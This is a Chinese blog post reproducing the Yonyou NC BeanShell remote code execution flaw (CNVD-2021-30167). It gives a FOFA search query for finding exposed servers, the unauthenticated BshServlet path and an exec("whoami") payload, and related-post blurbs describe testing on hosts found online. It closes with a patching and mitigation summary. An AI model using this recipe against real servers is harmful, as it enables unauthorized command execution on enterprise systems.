用友NC BeanShell远程代码执行漏洞复现

最新推荐文章于 2024-06-06 14:01:55 发布
最新推荐文章于 2024-06-06 14:01:55 发布
阅读量4.4k 收藏 4
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 渗透测试 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aixioxiaoxaio/article/details/117662726
本文详细介绍了用友NC管理软件的一个严重安全漏洞,该漏洞允许未经授权的攻击者通过BeanShell接口执行任意代码,获取服务器权限。复现流程包括在FAFO中输入特定语言,访问特定URL,修改URL为`ip/servlet/~ic/bsh.servlet.BshServlet`,并在Script中执行`exec(whoami)`命令,简单几步即可完成复现。此漏洞的易复现性和高危害性使得系统安全面临重大威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

用友NC远程代码执行漏洞复现

  1. 漏洞介绍
    用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。

  2. 影响范围
    NC 6.5版本

  3. 复现流程
    打开FAFO,输入语言:title==“YONYOU NC”。
    大概就是这个样子的。

在这里插入图片描述

接下来访问网址。
在这里插入图片描述

然后更改url为:ip/servlet/~ic/bsh.servlet.BshServlet
就是这个样子的
在这里插入图片描述

在Script中输入命令:exec(“whoami”)
在这里插入图片描述

复现完毕。漏洞还是比较简单的,所以危害度较高!

【CNVD-2021-30167】用友NC BeanShell 漏洞复现(CNVD-2021-30167)
千寻的博客
01-17 5371
用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
#渗透测试#批量漏洞挖掘#用友nc的命令执行漏洞
最新发布
soc的博客
02-06 673
用友NC是一款广泛应用于大中型企业的企业级管理软件,它提供了一体化的IT解决方案,包括建模、开发、集成、运行和管理等功能。然而,这款软件存在一个严重的安全隐患,即CNVD-2021-30167漏洞,该漏洞允许攻击者通过远程执行命令获取服务器权限。
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
LfanBQX的博客
06-06 1827
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露
weixin_45908624的博客
01-16 1932
NC 6.X 远程命令执行漏洞
用友NC BeanShell RCE漏洞
qq_44484541的博客
11-01 1216
用友 NC 是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。该漏洞为第三方 Jar 包漏洞导致,用友 NC 官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。3.这里有执行代码的接口,输入payload如:exec(“whoami”);2.访问路径/servlet/~ic/bsh.servlet.BshServlet。
用友NC BeanShell存在命令执行漏洞(CNVD-2021-30167)
maverickpig的博客
03-10 6383
用友命令执行漏洞复现
用友NC BeanShell远程代码执行
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
三个代码执行漏洞复现
gh0stf1re的博客
04-04 5734
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞
用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)
Kevin's Blog
06-03 6159
注:此文章仅供参考,未经企业单位授权请勿非法测试! 一、漏洞介绍 1.1 NC介绍   用友NCV6.5系统作为用友软件公司主打互联网平台型的ERP系统,致力于以混合云模式支撑大型企业的互联网化。面向集团企业的管理软件,同类市场占有率达到亚太第一。 1.2 漏洞介绍   2021年5月27日CNVD公开用友NC存在远程命令执行漏洞: 该漏洞由于对外开放了BeanShell接口,导致恶意攻击者可以在未授权情况下访问该接口,恶意攻击者通过开发不以为意开放的接口,构造恶意数据执行任意代码,最终获取服务器权限.
安全狐】用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
安全狐
06-06 2666
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 0x01漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。 0x02漏洞影响 用友 NC6.5版本 数据源于[安恒信息应急响应中心] 0x03漏洞复现 FOFA语句 icon_hash=“10859417
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5889
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 复现
shy的博客
06-10 4939
fofa搜索相关资产: icon_hash="1085941792" 访问首页如下: 漏洞Url为 /servlet/~ic/bsh.servlet.BshServlet 命令执行:
Beanshell的未授权利用
m0_53183117的博客
08-10 743
用友Beanshell解释器写入文件
用友NC bash.servlet.BshServlet 远程命令执行漏洞复现
热门推荐
panda的博客
09-16 1万+
用友NC bash.servlet.BshServlet 远程命令执行漏洞 漏洞成因: 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 复现过程 一:寻找可测试页面 使用FOFA对使用用友NC的页面进行搜索,如图所示: 找到打开为用友NC的页面,
BeanShell简介
海宇的博客
12-29 2584
简介: BeanShell 是一种脚本语言,一种完全符合java 语法的java 脚本语言,并且又拥有自己的一些语法和方法,beanShell 是一种松散类型的脚本语言(这点和JS 类似)。 下载地址:http://www.beanshell.org 设置环境 l 把;bsh-xx.jar 放到$JAVA_HOME/jre/lib/ext 文件夹下 l unix: ex...
X友NC远程命令执行
weixin_51345872的博客
09-27 2171
仅供学习参考使用,任何违法事情与本人无关
用友 NC bsh.servlet.BshServlet RCE
01-24
### 关于用友 NC 中 `bsh.servlet.BshServlet` 组件存在的 RCE 漏洞 #### 漏洞概述 用友 NC 的 `bsh.servlet.BshServlet` 组件存在远程命令执行 (Remote Code Execution, RCE) 漏洞。此漏洞允许未经身份验证的攻击者通过 BeanShell 测试接口直接执行任意命令,从而可能获取目标系统的管理权限[^1]。 #### 影响范围 受影响的产品版本包括但不限于特定版本的用友 NC 软件。当这些系统直接暴露在互联网上时,面临的风险显著增加[^3]。 #### 解决方案与缓解措施 ##### 1. 升级软件至最新版本 厂商通常会在新版本中修复已知的安全问题。因此建议立即升级到最新的稳定版用友 NC 应用程序,以确保所有已发布的补丁都已被应用。 ##### 2. 移除不必要的服务端点 对于不再使用的功能模块或测试接口,应当及时禁用或删除对应的 URL 映射路径。特别是像 `/webroot/decision/system/sysservlet/BshServlet` 这样的高危接口应被彻底移除[^2]。 ##### 3. 配置防火墙规则 在网络层面设置严格的访问控制策略,仅允许来自可信 IP 地址的数据包到达服务器上的 Web 应用程序。这可以有效阻止外部未授权用户的非法尝试。 ##### 4. 实施最小权限原则 调整应用程序配置文件中的参数设定,使得即使发生越权操作也无法造成严重后果。例如限制上传脚本的能力以及缩小 Java 反序列化白名单等。 ##### 5. 启用日志审计机制 开启详细的请求记录并定期审查异常活动模式;一旦发现可疑行为即刻采取行动防止潜在威胁扩散。 ```xml <!-- Example of disabling BshServlet in web.xml --> <servlet> <servlet-name>BshServlet</servlet-name> <servlet-class>bsh.servlet.BshServlet</servlet-class> <!-- Disable the servlet by commenting out or removing this section --> <!--<url-pattern>/bshservlet/*</url-pattern>--> </servlet> ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值